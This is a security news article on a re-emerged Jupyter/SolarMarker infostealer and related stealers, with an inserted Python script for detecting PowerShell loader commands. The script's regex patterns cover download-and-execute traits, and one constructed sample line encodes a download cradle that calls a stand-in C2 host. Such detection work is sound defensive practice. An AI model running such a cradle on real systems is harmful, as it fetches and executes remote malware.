An upgraded Jupyter infostealer malware has returned in the wild

November 16, 2023
Jupyter Infostealer Malware Malvertising

A newly upgraded variant of the Jupyter infostealer malware has returned to the cybercriminal landscape.

According to reports, the updated malware incorporates subtle but effective changes that let it establish persistence on compromised systems covertly. Researchers have recently observed new waves of Jupyter attacks that employ modified PowerShell commands and private-key signatures to make the malware appear to be a legitimately signed file, enhancing its stealth.

The Jupyter infostealer malware is notorious for using SEO techniques for its operations.

The Jupyter infostealer malware is known by various names, such as Polazert, SolarMarker, and Yellow Cockatoo. This malware commonly manipulates search engine optimisation (SEO) techniques and malvertising to gain initial access and deceive users into downloading it from fake or sketchy websites.

In addition, this malware could harvest credentials, establish encrypted C2 communication, exfiltrate data, and execute arbitrary commands.

The latest iteration of the malware uses various certificates to sign itself, giving it an appearance of legitimacy. Once a target launches one of the fake installers, it initiates an infection chain built around an interim payload, which uses PowerShell to connect to a remote server and then decodes and executes the infostealer.
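To give defenders something concrete for the loader stage just described, here is an added example (not from the article or from any of the researchers it cites) that triages PowerShell command lines, such as those recorded in process-creation or script-block logs, for the traits the article mentions: a hidden, encoded command that reaches a remote server, then decodes and executes what it fetched. The indicator names, the constructed sample lines and the three-hit threshold are this example's own assumptions.

```python
import base64
import binascii
import re

# Traits of the loader stage described in the article: a PowerShell command that
# hides its window, is base64-encoded, downloads from a remote host, and decodes
# and executes the result. Indicator names are this example's own.
INDICATORS = {
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "encoded_command": re.compile(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.I),
    "policy_bypass": re.compile(r"-ex(?:ecutionpolicy)?\s+bypass", re.I),
    "download_cradle": re.compile(r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|net\.webclient", re.I),
    "base64_decode": re.compile(r"frombase64string", re.I),
    "invoke_expression": re.compile(r"invoke-expression|\biex\b", re.I),
}


def decode_encoded_command(cmdline):
    """Return the plaintext of a -EncodedCommand argument (base64 of UTF-16LE), or None."""
    m = INDICATORS["encoded_command"].search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError):
        return None  # not a well-formed encoded command; judge the raw line only


def analyze_command_line(cmdline):
    """Match every indicator against the raw line plus any decoded payload."""
    decoded = decode_encoded_command(cmdline)
    text = cmdline if decoded is None else cmdline + "\n" + decoded
    hits = sorted(name for name, rx in INDICATORS.items() if rx.search(text))
    # Three independent traits together is the (assumed) alerting threshold.
    return {"indicators": hits, "decoded": decoded, "suspicious": len(hits) >= 3}


def _encode_ps(script):
    """Encode a script the way powershell.exe -EncodedCommand expects."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed sample log entries; none is a real Jupyter/SolarMarker command.
SAMPLE_COMMAND_LINES = [
    "powershell.exe -NoProfile -WindowStyle Hidden -EncodedCommand "
    + _encode_ps("IEX (New-Object Net.WebClient).DownloadString('http://c2.example.invalid/p')"),
    'powershell.exe -ExecutionPolicy Bypass -Command "Invoke-Expression '
    '([Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($blob)))"',
    'powershell.exe -Command "Get-ChildItem C:\\Users\\alice\\Documents"',
]

if __name__ == "__main__":
    for line in SAMPLE_COMMAND_LINES:
        result = analyze_command_line(line)
        print("SUSPICIOUS" if result["suspicious"] else "benign    ", result["indicators"])
```

Because the encoded payload is decoded before matching, the download-and-execute cradle is found even though it never appears in plaintext in the log line.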

The development of these variants is part of an ongoing evolution in the cybercriminal community, one that lowers the barrier to infecting systems for less skilled or amateur actors.

For example, Lumma Stealer has received an upgrade that includes a loader and the ability to randomly generate a build for improved obfuscation. This transition enables the malware to progress from a data stealer to a more advanced threat that could launch second-stage attacks, potentially even deploying ransomware.

Furthermore, Mystic Stealer is another malware family that continuously receives enhancements from its developers. Its recent versions add loader functionality alongside its information-stealing features.

The code for Mystic Stealer keeps evolving, expanding its data theft abilities and updating its network communication protocol to help distribute additional malware families, such as RedLine, DarkGate, and GCleaner.

Organisations should also improve their cybersecurity defences to remain one step ahead of these malware developments and hackers.
